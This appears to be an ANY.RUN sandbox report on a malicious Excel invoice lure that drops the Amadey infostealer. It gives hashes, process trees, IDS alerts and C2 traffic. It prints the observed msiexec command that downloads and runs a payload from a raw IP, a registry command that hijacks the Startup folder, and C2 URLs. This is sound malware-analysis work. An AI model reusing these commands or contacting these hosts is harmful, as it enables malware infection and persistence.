analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DDA56A32_Factura_FMC7736_20190424.xls

Full analysis: https://app.any.run/tasks/75b20f40-5737-46cc-a3c7-6e564f094e3d
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 25, 2019, 20:15:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
trojan
amadey
loader
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 15:32:18 2019, Security: 0
MD5:

F04ECA1CF8A93F8CA7FFF0E976036E02

SHA1:

3FD6114E6D5A6792CC5E8EB587DBD5E106A5B60A

SHA256:

559210D28DCBFF8517F3BDDDC8E298D188D543785ADC9FDF96CED005A29B72BA

SSDEEP:

1536:hKpb8rGYrMPelwhKmFV5xtezEsgrdg7pUQjSKhLfo0/Jt4jeJ32RLEQfz1Wr:hKpb8rGYrMPelwhKmFV5xtezEsgrdg7N

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2668)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 2668)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 3440)
    • AMADEY was detected

      • cmualrc.exe (PID: 3440)
    • Changes the Startup folder

      • REG.exe (PID: 2228)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3564)
    • Connects to CnC server

      • cmualrc.exe (PID: 3440)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3564)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3564)
      • MSI65F.tmp (PID: 2904)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3564)
    • Starts itself from another location

      • MSI65F.tmp (PID: 2904)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 3440)
    • Creates files in the program directory

      • MSI65F.tmp (PID: 2904)
  • INFO

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3564)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3564)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2668)
    • Application was dropped or rewritten from another process

      • MSI65F.tmp (PID: 2904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:04:24 14:32:18
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi65f.tmp #AMADEY cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2668"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2188msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3564C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2904"C:\Windows\Installer\MSI65F.tmp"C:\Windows\Installer\MSI65F.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3440c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI65F.tmp
User:
admin
Integrity Level:
MEDIUM
2228REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
797
Read events
731
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
2668EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRFB8E.tmp.cvr
MD5:
SHA256:
3564msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF73A7A87DC9406ACA.TMP
MD5:
SHA256:
3564msiexec.exeC:\Windows\Installer\130544.ipi
MD5:
SHA256:
3564msiexec.exeC:\Windows\Installer\MSI5A2.tmp
MD5:
SHA256:
3564msiexec.exeC:\Windows\Installer\MSI65F.tmp
MD5:
SHA256:
2904MSI65F.tmpC:\ProgramData\0
MD5:
SHA256:
2904MSI65F.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
3564msiexec.exeC:\Config.Msi\130545.rbs
MD5:
SHA256:
3440cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
3564msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF05CBAA8DD7C21CE0.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3564
msiexec.exe
GET
200
109.234.38.177:80
http://109.234.38.177/dom4
RU
executable
172 Kb
suspicious
3440
cmualrc.exe
POST
200
81.12.175.59:80
http://gohaiendo.com/ppk/index.php
RO
text
6 b
malicious
3440
cmualrc.exe
POST
200
81.12.175.59:80
http://gohaiendo.com/ppk/index.php
RO
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3440
cmualrc.exe
81.12.175.59:80
gohaiendo.com
Vodafone Romania S.A.
RO
suspicious
3564
msiexec.exe
109.234.38.177:80
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 81.12.175.59
  • 181.197.131.40
  • 95.111.66.122
  • 213.222.130.75
  • 86.61.75.99
  • 95.140.195.178
  • 178.169.222.191
  • 86.104.75.4
  • 93.103.166.70
malicious

Threats

PID
Process
Class
Message
3564
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3564
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3440
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3440
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3440
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3440
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3 ETPRO signatures available at the full report
No debug info